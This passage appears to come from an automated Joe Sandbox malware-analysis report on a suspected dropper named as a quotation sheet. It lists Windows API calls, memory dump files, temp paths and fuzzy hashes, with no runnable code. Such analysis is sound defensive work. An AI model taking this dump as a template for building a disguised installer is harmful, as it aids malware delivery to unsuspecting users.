                                                                                • Opcode ID: ef5ff3cba37bdb2e26199f17b8c5be3437539e0f0002abd4d10d443ac5288961
                                                                                • Instruction ID: 59ddb31903a36680b4224ad2704aa62d89b79b457576c75755388437ec856a92
                                                                                • Opcode Fuzzy Hash: ef5ff3cba37bdb2e26199f17b8c5be3437539e0f0002abd4d10d443ac5288961
                                                                                • Instruction Fuzzy Hash: D5F01D70900208AAEF205F60DD0ABAE3779FB04345F00803AFA16B51D0D7B9AA559B59
                                                                                APIs
                                                                                • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,?,?,?,000000F0), ref: 0040271A
                                                                                • GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,?,000000F0), ref: 00402736
                                                                                • GlobalFree.KERNEL32(?), ref: 0040276F
                                                                                • GlobalFree.KERNEL32(00000000), ref: 00402782
                                                                                • CloseHandle.KERNEL32(?,?,?,?,000000F0), ref: 0040279A
                                                                                • DeleteFileA.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,?,?,?,000000F0), ref: 004027AE
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.38290357022.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.38290259884.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.38290450253.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.38290508326.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.38290508326.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.38290508326.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.38290508326.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.38290508326.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.38290706883.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_z1QuotationSheetVSAA6656776.jbxd
                                                                                Similarity
                                                                                • API ID: Global$AllocFree$CloseDeleteFileHandle
                                                                                • String ID:
                                                                                • API String ID: 2667972263-0
                                                                                • Opcode ID: ca0be688d7f720411948d387ee0049612bb77ca8bca973687b1d637323e3bb01
                                                                                • Instruction ID: 485419aab899adaa45f09767fc84dfb68f9751acdadaf5e244b928a283e6c860
                                                                                • Opcode Fuzzy Hash: ca0be688d7f720411948d387ee0049612bb77ca8bca973687b1d637323e3bb01
                                                                                • Instruction Fuzzy Hash: 0A21AE71800128BBCF116FA5CE89DAE7A79EF08364F10423AF921762D0C7795D018F98
                                                                                APIs
                                                                                • lstrlenA.KERNEL32(ldreboligblokkene: Installing,ldreboligblokkene: Installing,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,00404758,000000DF,00000000,00000400,?), ref: 004048DB
                                                                                • wsprintfA.USER32 ref: 004048E3
                                                                                • SetDlgItemTextA.USER32(?,ldreboligblokkene: Installing), ref: 004048F6
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.38290357022.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.38290259884.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.38290450253.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.38290508326.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.38290508326.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.38290508326.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.38290508326.0000000000428000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.38290508326.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.38290706883.0000000000433000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_z1QuotationSheetVSAA6656776.jbxd
                                                                                Similarity
                                                                                • API ID: ItemTextlstrlenwsprintf
                                                                                • String ID: %u.%u%s%s$ldreboligblokkene: Installing
                                                                                • API String ID: 3540041739-1183586245
                                                                                • Opcode ID: bf1bdcac2109adbb76e2cfdf4929b7a7dc251d6602f1380599200b875f001fd7
                                                                                • Instruction ID: c0766d521516c7b6303674c7dd8cea214f166acaf9b397f83c092fcb524d35e8
                                                                                • Opcode Fuzzy Hash: bf1bdcac2109adbb76e2cfdf4929b7a7dc251d6602f1380599200b875f001fd7
                                                                                • Instruction Fuzzy Hash: 6A110A736041283BDB0076ADDC45EAF3288DB85374F254637FA65F21D1EA78CC1285E8
                                                                                APIs
                                                                                • RegOpenKeyExA.ADVAPI32(?,?,00000000,?,?), ref: 00402A9B
                                                                                • RegEnumKeyA.ADVAPI32(?,00000000,?,00000105), ref: 00402AD7
                                                                                • RegCloseKey.ADVAPI32(?), ref: 00402AE0
                                                                                • RegCloseKey.ADVAPI32(?), ref: 00402B05
                                                                                • RegDeleteKeyA.ADVAPI32(?,?), ref: 00402B23
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.38290357022.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.38290259884.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.38290450253.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.38290508326.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.38290508326.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.38290508326.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.38290508326.0000000000428000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.38290508326.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.38290706883.0000000000433000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_z1QuotationSheetVSAA6656776.jbxd
                                                                                Similarity
                                                                                • API ID: Close$DeleteEnumOpen
                                                                                • String ID:
                                                                                • API String ID: 1912718029-0
                                                                                • Opcode ID: ba179b4ab06ec51544505c7bb4ef6d82f25395ff453b8f9fc11c3f7a3e81ed6a
                                                                                • Instruction ID: 2c69578fec59b839bbbb6554d628e5ed2d7180fb0bd31e8d2d7d3181fb534eb1
                                                                                • Opcode Fuzzy Hash: ba179b4ab06ec51544505c7bb4ef6d82f25395ff453b8f9fc11c3f7a3e81ed6a
                                                                                • Instruction Fuzzy Hash: 93113D71A00108BEDF229F90DE89DAA3B7DEB54349B504436F901F10A0D775AE51EB69
                                                                                APIs
                                                                                • GetDlgItem.USER32(?), ref: 00401CE2
                                                                                • GetClientRect.USER32(00000000,?), ref: 00401CEF
                                                                                • LoadImageA.USER32(?,00000000,?,?,?,?), ref: 00401D10
                                                                                • SendMessageA.USER32(00000000,00000172,?,00000000), ref: 00401D1E
                                                                                • DeleteObject.GDI32(00000000), ref: 00401D2D
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.38290357022.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.38290259884.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.38290450253.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.38290508326.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.38290508326.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.38290508326.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.38290508326.0000000000428000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.38290508326.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.38290706883.0000000000433000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_z1QuotationSheetVSAA6656776.jbxd
                                                                                Similarity
                                                                                • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                                                • String ID:
                                                                                • API String ID: 1849352358-0
                                                                                • Opcode ID: 4b124ebf7538d090bfdb3da7142055cc4b6059543a11cd4ffa057e0c03021937
                                                                                • Instruction ID: 869b35d44be7719ac4f8667573c2d83536e062a508785c5670752e956bf1946f
                                                                                • Opcode Fuzzy Hash: 4b124ebf7538d090bfdb3da7142055cc4b6059543a11cd4ffa057e0c03021937
                                                                                • Instruction Fuzzy Hash: 1BF0ECB2A04114AFEB01ABE4DD88DAFB7BDEB54305B104476F602F6191C7749D018B79
                                                                                APIs
                                                                                • GetDC.USER32(?), ref: 00401D3B
                                                                                • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401D48
                                                                                • MulDiv.KERNEL32(00000000,00000002,00000000), ref: 00401D57
                                                                                • ReleaseDC.USER32(?,00000000), ref: 00401D68
                                                                                • CreateFontIndirectA.GDI32(0040A808), ref: 00401DB3
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.38290357022.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.38290259884.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.38290450253.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.38290508326.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.38290508326.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.38290508326.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.38290508326.0000000000428000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.38290508326.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.38290706883.0000000000433000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_z1QuotationSheetVSAA6656776.jbxd
                                                                                Similarity
                                                                                • API ID: CapsCreateDeviceFontIndirectRelease
                                                                                • String ID:
                                                                                • API String ID: 3808545654-0
                                                                                • Opcode ID: b593fc5a2fd6a4ee5b454699a03de6678a14f4e0c95d94d4c585d04139cbc6e4
                                                                                • Instruction ID: 002072324c9ca14b61f47775792bd0911152047613ce7f91f46ea316c06ba8c0
                                                                                • Opcode Fuzzy Hash: b593fc5a2fd6a4ee5b454699a03de6678a14f4e0c95d94d4c585d04139cbc6e4
                                                                                • Instruction Fuzzy Hash: 22016232944340AFE7016770AE5EBAA3FA89795305F108479F641B62E2C67801568F6F
                                                                                APIs
                                                                                • SetWindowTextA.USER32(00000000,00422F20), ref: 00403B40
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.38290357022.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.38290259884.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.38290450253.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.38290508326.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.38290508326.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.38290508326.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.38290508326.0000000000428000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.38290508326.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.38290706883.0000000000433000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_z1QuotationSheetVSAA6656776.jbxd
                                                                                Similarity
                                                                                • API ID: TextWindow
                                                                                • String ID: "C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe"$1033$ldreboligblokkene: Installing
                                                                                • API String ID: 530164218-3840537940
                                                                                • Opcode ID: 574545a4997d909eae1046e12a00ecd62f2fc1531b09d5061d7595ecc4ae8c7e
                                                                                • Instruction ID: 4ecc7a7cce5d2b157b8937249730f08b858357f8198c33761da0ca3de106299a
                                                                                • Opcode Fuzzy Hash: 574545a4997d909eae1046e12a00ecd62f2fc1531b09d5061d7595ecc4ae8c7e
                                                                                • Instruction Fuzzy Hash: CE11C971B006119BC7309F55DC909737B7CEB8571A364817FD90167391D73DAD029A58
                                                                                APIs
                                                                                • lstrlenA.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00403218,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040341B), ref: 004058DB
                                                                                • CharPrevA.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,00403218,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040341B), ref: 004058E4
                                                                                • lstrcatA.KERNEL32(?,00409014), ref: 004058F5
                                                                                Strings
                                                                                • C:\Users\user\AppData\Local\Temp\, xrefs: 004058D5
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.38290357022.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.38290259884.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.38290450253.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.38290508326.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.38290508326.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.38290508326.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.38290508326.0000000000428000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.38290508326.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.38290706883.0000000000433000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_z1QuotationSheetVSAA6656776.jbxd
                                                                                Similarity
                                                                                • API ID: CharPrevlstrcatlstrlen
                                                                                • String ID: C:\Users\user\AppData\Local\Temp\
                                                                                • API String ID: 2659869361-3355392842
                                                                                • Opcode ID: 39623dee3265ed167cf4eb0d952b1efefe5673d98ca6e2622bb109ae9f6b3ea7
                                                                                • Instruction ID: 3de60a59262c475c5440d19c682801eda6224deee4fb27ea49e877a9fa99e37c
                                                                                • Opcode Fuzzy Hash: 39623dee3265ed167cf4eb0d952b1efefe5673d98ca6e2622bb109ae9f6b3ea7
                                                                                • Instruction Fuzzy Hash: A6D0A972605A303AD20233198C05E8B3A08CF26351B040032F641B22A2CA7C0E418BFE
                                                                                APIs
                                                                                • CharNextA.USER32(?,?,C:\Users\user\AppData\Local\Temp\nsl9DD3.tmp,?,004059DA,C:\Users\user\AppData\Local\Temp\nsl9DD3.tmp,C:\Users\user\AppData\Local\Temp\nsl9DD3.tmp,75DF3410,?,75DF2EE0,00405725,?,75DF3410,75DF2EE0,00000000), ref: 0040597C
                                                                                • CharNextA.USER32(00000000), ref: 00405981
                                                                                • CharNextA.USER32(00000000), ref: 00405995
                                                                                Strings
                                                                                • C:\Users\user\AppData\Local\Temp\nsl9DD3.tmp, xrefs: 0040596F
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.38290357022.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.38290259884.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.38290450253.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.38290508326.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.38290508326.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.38290508326.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.38290508326.0000000000428000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.38290508326.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.38290706883.0000000000433000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_z1QuotationSheetVSAA6656776.jbxd
                                                                                Similarity
                                                                                • API ID: CharNext
                                                                                • String ID: C:\Users\user\AppData\Local\Temp\nsl9DD3.tmp
                                                                                • API String ID: 3213498283-2551829887
                                                                                • Opcode ID: c01f0a1332e094523614662ca2a683f3687d2570a221d834ee5f6cec315170af
                                                                                • Instruction ID: 93fa8612b98c37d3538e1dab61372dab2b439c5e428625c22ffade58a408e5cb
                                                                                • Opcode Fuzzy Hash: c01f0a1332e094523614662ca2a683f3687d2570a221d834ee5f6cec315170af
                                                                                • Instruction Fuzzy Hash: D0F096D1909F60ABFB3292684C54B775B8DCB55771F18547BE540B62C2C27C48408FAA
                                                                                APIs
                                                                                • CloseHandle.KERNEL32(000002C4,C:\Users\user\AppData\Local\Temp\,00403528,?), ref: 00403703
                                                                                • CloseHandle.KERNEL32(000002D4,C:\Users\user\AppData\Local\Temp\,00403528,?), ref: 00403717
                                                                                Strings
                                                                                • C:\Users\user\AppData\Local\Temp\, xrefs: 004036F6
                                                                                • C:\Users\user\AppData\Local\Temp\nsl9DD3.tmp, xrefs: 00403727
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.38290357022.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.38290259884.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.38290450253.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.38290508326.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.38290508326.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.38290508326.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.38290508326.0000000000428000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.38290508326.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.38290706883.0000000000433000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_z1QuotationSheetVSAA6656776.jbxd
                                                                                Similarity
                                                                                • API ID: CloseHandle
                                                                                • String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\nsl9DD3.tmp
                                                                                • API String ID: 2962429428-2744151807
                                                                                • Opcode ID: 845743e00834e27212fb565fb71f1af62539aea410875136eefd1b85513272db
                                                                                • Instruction ID: a64c404821d2138faf7c298dc7aa4842799881c741ebf925b7f901023762ac75
                                                                                • Opcode Fuzzy Hash: 845743e00834e27212fb565fb71f1af62539aea410875136eefd1b85513272db
                                                                                • Instruction Fuzzy Hash: C6E086B0500620D6C524AF7CAD855463B196B413357208322F574F30F1C338AD435EAC
                                                                                APIs
                                                                                  • Part of subcall function 00405E63: lstrcpynA.KERNEL32(?,?,00000400,004032D9,00422F20,NSIS Error), ref: 00405E70
                                                                                  • Part of subcall function 0040596E: CharNextA.USER32(?,?,C:\Users\user\AppData\Local\Temp\nsl9DD3.tmp,?,004059DA,C:\Users\user\AppData\Local\Temp\nsl9DD3.tmp,C:\Users\user\AppData\Local\Temp\nsl9DD3.tmp,75DF3410,?,75DF2EE0,00405725,?,75DF3410,75DF2EE0,00000000), ref: 0040597C
                                                                                  • Part of subcall function 0040596E: CharNextA.USER32(00000000), ref: 00405981
                                                                                  • Part of subcall function 0040596E: CharNextA.USER32(00000000), ref: 00405995
                                                                                • lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\nsl9DD3.tmp,00000000,C:\Users\user\AppData\Local\Temp\nsl9DD3.tmp,C:\Users\user\AppData\Local\Temp\nsl9DD3.tmp,75DF3410,?,75DF2EE0,00405725,?,75DF3410,75DF2EE0,00000000), ref: 00405A16
                                                                                • GetFileAttributesA.KERNEL32(C:\Users\user\AppData\Local\Temp\nsl9DD3.tmp,C:\Users\user\AppData\Local\Temp\nsl9DD3.tmp,C:\Users\user\AppData\Local\Temp\nsl9DD3.tmp,C:\Users\user\AppData\Local\Temp\nsl9DD3.tmp,C:\Users\user\AppData\Local\Temp\nsl9DD3.tmp,C:\Users\user\AppData\Local\Temp\nsl9DD3.tmp,00000000,C:\Users\user\AppData\Local\Temp\nsl9DD3.tmp,C:\Users\user\AppData\Local\Temp\nsl9DD3.tmp,75DF3410,?,75DF2EE0,00405725,?,75DF3410,75DF2EE0), ref: 00405A26
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.38290357022.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.38290259884.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.38290450253.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.38290508326.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.38290508326.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.38290508326.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.38290508326.0000000000428000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.38290508326.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.38290706883.0000000000433000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_z1QuotationSheetVSAA6656776.jbxd
                                                                                Similarity
                                                                                • API ID: CharNext$AttributesFilelstrcpynlstrlen
                                                                                • String ID: C:\Users\user\AppData\Local\Temp\nsl9DD3.tmp
                                                                                • API String ID: 3248276644-2551829887
                                                                                • Opcode ID: 0ef386635608f692f0e7c0f61560742430c47c7f4d5a656852c6bdb0725f2d70
                                                                                • Instruction ID: c86e2d8d38d71570b191e9a15eff5061e4cbb4187268480765cc96090d0558f9
                                                                                • Opcode Fuzzy Hash: 0ef386635608f692f0e7c0f61560742430c47c7f4d5a656852c6bdb0725f2d70
                                                                                • Instruction Fuzzy Hash: A2F07D71200D5052C73233350C4669F1644CE82374708023BF8A0B22D2D73C8D02CD7D
                                                                                APIs
                                                                                • IsWindowVisible.USER32(?), ref: 0040501F
                                                                                • CallWindowProcA.USER32(?,?,?,?), ref: 00405070
                                                                                  • Part of subcall function 00404094: SendMessageA.USER32(0001041E,00000000,00000000,00000000), ref: 004040A6
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.38290357022.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.38290259884.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.38290450253.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.38290508326.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.38290508326.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.38290508326.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.38290508326.0000000000428000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.38290508326.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.38290706883.0000000000433000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_z1QuotationSheetVSAA6656776.jbxd
                                                                                Similarity
                                                                                • API ID: Window$CallMessageProcSendVisible
                                                                                • String ID:
                                                                                • API String ID: 3748168415-3916222277
                                                                                • Opcode ID: 0b9e3fe4afe9fd5950d24fc38bd805c0ffc83546a9c92a8d1e346af401a4be56
                                                                                • Instruction ID: c10ccb832a2a3496aa312e1d90523b33251ee11bfabb6cbb9dcba6f20acc8f53
                                                                                • Opcode Fuzzy Hash: 0b9e3fe4afe9fd5950d24fc38bd805c0ffc83546a9c92a8d1e346af401a4be56
                                                                                • Instruction Fuzzy Hash: ED018471504609ABDF205F61EC80EAF3725EB84754F148037FB01751E2C77A8C929FAA
                                                                                APIs
                                                                                • lstrlenA.KERNEL32(80000000,C:\Users\user\Desktop,00402D22,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe,C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe,80000000,00000003), ref: 00405922
                                                                                • CharPrevA.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,00402D22,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe,C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe,80000000,00000003), ref: 00405930
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.38290357022.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.38290259884.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.38290450253.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.38290508326.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.38290508326.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.38290508326.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.38290508326.0000000000428000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.38290508326.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.38290706883.0000000000433000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_z1QuotationSheetVSAA6656776.jbxd
                                                                                Similarity
                                                                                • API ID: CharPrevlstrlen
                                                                                • String ID: C:\Users\user\Desktop
                                                                                • API String ID: 2709904686-3370423016
                                                                                • Opcode ID: cad1fee570528055bb4f840757e41c2b2d093a40416f1971c342fc3ba500c074
                                                                                • Instruction ID: 8de3941b568bd0f8b26bcb964e879cd368c776abfab0e8ce3c3ebd0dc0734e68
                                                                                • Opcode Fuzzy Hash: cad1fee570528055bb4f840757e41c2b2d093a40416f1971c342fc3ba500c074
                                                                                • Instruction Fuzzy Hash: 1CD0C7B2409D70AEE3036314DC04F9F6A48DF27715F094462E181E61A1C6BC5D814BED
                                                                                APIs
                                                                                • GlobalAlloc.KERNEL32(00000040,?), ref: 1000115B
                                                                                • GlobalFree.KERNEL32(00000000), ref: 100011B4
                                                                                • GlobalFree.KERNEL32(?), ref: 100011C7
                                                                                • GlobalFree.KERNEL32(?), ref: 100011F5
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.38301650689.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                                                • Associated: 00000000.00000002.38301620249.0000000010000000.00000002.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000000.00000002.38301679644.0000000010003000.00000002.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000000.00000002.38301712469.0000000010005000.00000002.00000001.01000000.00000004.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_10000000_z1QuotationSheetVSAA6656776.jbxd
                                                                                Similarity
                                                                                • API ID: Global$Free$Alloc
                                                                                • String ID:
                                                                                • API String ID: 1780285237-0
                                                                                • Opcode ID: 6ef9e3687ab983c99c874163fdcc0ee6cc2800f994ca68b8431a209e6fec97f5
                                                                                • Instruction ID: 5d3a3765e571093bf703368c32e31ec5bfeafbef09712c331e02e9e13643e521
                                                                                • Opcode Fuzzy Hash: 6ef9e3687ab983c99c874163fdcc0ee6cc2800f994ca68b8431a209e6fec97f5
